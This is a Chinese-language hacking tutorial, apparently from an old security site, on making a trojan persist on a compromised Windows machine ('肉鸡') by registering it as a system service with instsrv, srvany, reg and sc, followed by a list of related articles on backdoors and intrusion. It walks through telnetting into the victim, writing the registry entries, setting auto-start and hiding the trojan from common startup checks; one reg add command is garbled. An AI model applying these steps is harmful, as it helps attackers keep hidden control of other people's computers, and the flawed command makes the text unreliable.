如何把木马注册为系统服务
一般木马启动的办法不外乎以下几种: 1.启动组 2.autoexe.bat 3.注册表 4.win.ini 5.sysytem.ini6.winstat.bat
7.*.inf
8.*.autorun
那么我们如何把自己的马儿注册为系统服务,从而增强其隐蔽性呢?下面是实现办法:
我们所需的工具已经由微软提供在win2000 resouce kit工具包里,名为instsrv.exe srvany.exe reg.exe sc.exe当然还需要配置好的马儿,
就叫trojan.exe吧。我们先telnet上肉鸡,将上述工具copy到system32目录下,下面就开始行动啦,
命令为instsrv.exe myservice srvany.exe。
这样就已经注册了一项系统服务,名为myservice,下面就要操作注册表,我们要在heky_local_machine\system\currentcontrolset\services找到我们刚才添加的myservice,
新建一个键,名为parameters,在parameters下新建键名为application,类型为reg_sz,
数据值就是c:\winnt\system32\trojan.exe.
那么我们如何实现以上操作呢?偶提供两种办法,一现在自己机机上操作,将heky_local_machine\system\currencontrolset\services-parameters导出为srv.reg一并传到肉鸡,
然后运行reg.exe /import srv.reg .这样就将ko了。另外一种就是用reg.exe手动添加。
reg.exe的用法如下:
f:\tools\nettools>reg
reg query /?
reg add /?
reg delete /?
reg copy /?
reg save /?
reg restore /?
reg load /?
reg unload /?
reg compare /?
reg export /?
reg import /?
rootkey [ hklm hkcu hkcr hku hkcc ]
subkey the full name of a registry key under the selected rootkey
valuename the value name, under the selected key, to add
/ve add the empty value name <no name>
type [ reg_sz reg_multi_sz reg_dword_big_endian
reg_dword reg_binary reg_dword_little_endian
reg_none reg_expand_sz ]
if omitted, reg_sz is assumed
separator specify one charactor that you use as the separator in your data
string for reg_multi_sz. if omitted, use "\0" as the separator
data the data to assign to the registry valuename being added
/f force overwriting the existing registry entry without prompt
每次都会返回代码0,1 0表示成功,1表示失败:(。
下是一例子:reg add hklm\software\myco /v path /t reg_expand_sz /d %"systemroot"%
adds a value (name: path, type: reg_expand_sz, data: %systemroot%)
notice: put the double quote ( " ) inside the expand string
根据这个例子不难看出,我们要添加的服务的命令应该是:reg add hkcc\system\currentcontrolset\parameters /v myservice /t reg_sz /d
c:\winnt\system32
嘿嘿!好了马儿就变成服务了呀,下面就运行trojan.exe吧
另外你需要用sc.exe来congfig一下,将myservice配置为auto,sc.exe
大家用的多了,偶就不多废话了。
^_^加上马儿的自我保护,你的马会不会变成"不死神马"呀!
注意尽量不要让木马以开头提到的8种方法启动,以免被查出trojan.exe的路径而被删除掉。
↓相关文章:
- · SYN flood攻击的原理及其防御
- · IP地址含义知多少
- · 校园机房安装组建过程实战讲解
- · 构筑牢固的校园网络安全体系
- · 数字证书使用一点通
- · TCP/IP头格式
- · 使用VB实现邮箱自动注册
- · 端口截听实现端口隐藏嗅探与攻击
- · 从上传webshell到突破TCP/IP筛选到3389终端登陆
- · 五个反弹后门的源代码
- · 木马客户端与服务端隐蔽通讯解析
- · Hack新手一定要知道的问题
- · Do All in Cmd Shell (一切尽在命令行)
- · httpdoor---IIS后门
- · 135网络端口,禁用有巧招
- · 建立隐藏的超级用户多种方法
- · 狙击4899肉鸡
- · 告诉大家一个小技巧 一直没人提到过的东东
- · php注入之完全版
- · 千个常用DOS命令全面收藏
- · 如何提高Linux系统安全性的十大招数
- · 网站被入侵之后 需要做的检测
- · 通过PHP v4.0.2rc1-v4.0.7RC2 exploit program 拿到root
- · 下载软件勿忘防毒:嵌入式监控确保上网无忧
- · 详述光波分复用(WDM)技术(中篇)
- · 揭开网络
- · 资深网管教你彻底揪出Windows启动蛀虫
- · 用IDS(入侵检测系统)保卫数据库安全
- · 安全防御系统新趋势 IPS筛选八大定律
- · 通过注册表优化ADSL大法之Win XP篇
- · 消除上网的恐惧:用网上隐身衣保护自己
- · 脚本图片类后门病毒的完美使用方法
- · 局域网中受ARP欺骗攻击后的解决方法
- · 超级DIY WindowsXP登录界面自己做
- · 黑客攻击揭密-分析选定的网络攻击
- · 打破常规 构造特殊字符进行渗透入侵
- · 实用技巧:如何全面抵制黑客攻击
- · 木马“加/脱壳”的详细实现过程
- · 黑客横行的时代 URL地址都会说谎
- · 网管必知 路由器保护内网安全九大步骤
- · 入侵技巧 通过“鼠洞”控制你的电脑
- · 网管必知 严禁即时通信工具使用代理
- · 火眼金睛识木马 木马画皮伪装七计
- · 实例讲解 黑客入侵论坛各种手段大暴光
- · 互联网的巨大威胁 ICMP洪水攻击浅析
- · 查杀耗尽CPU资源的Explored病毒
- · CCNP路由精华7:在可扩展的网络中实施BGP
- · CCNP路由精华6:配置基本的边界网关协议
- · CCNP路由精华4:互连多个OSPF区域
- · CCNP路由精华5:配置EIGRP
- · CCNP路由精华3:在单个区域办配置OSPF
- · IE收藏夹也可以按名称排序
- · 网管必备 校园网的主动防护策略配置实例
- · Windows 2000/XP在局域网内批量升级
- · 黑客经常更改的系统配置文件及注册表
- · 底层安全——路由篇
- · 黑客实施攻击的步骤与方法
- · 关闭包藏祸心的危险端口
- · 几个易被误认为病毒的文件
- · 没有电脑的入侵 深入浅出社会工程学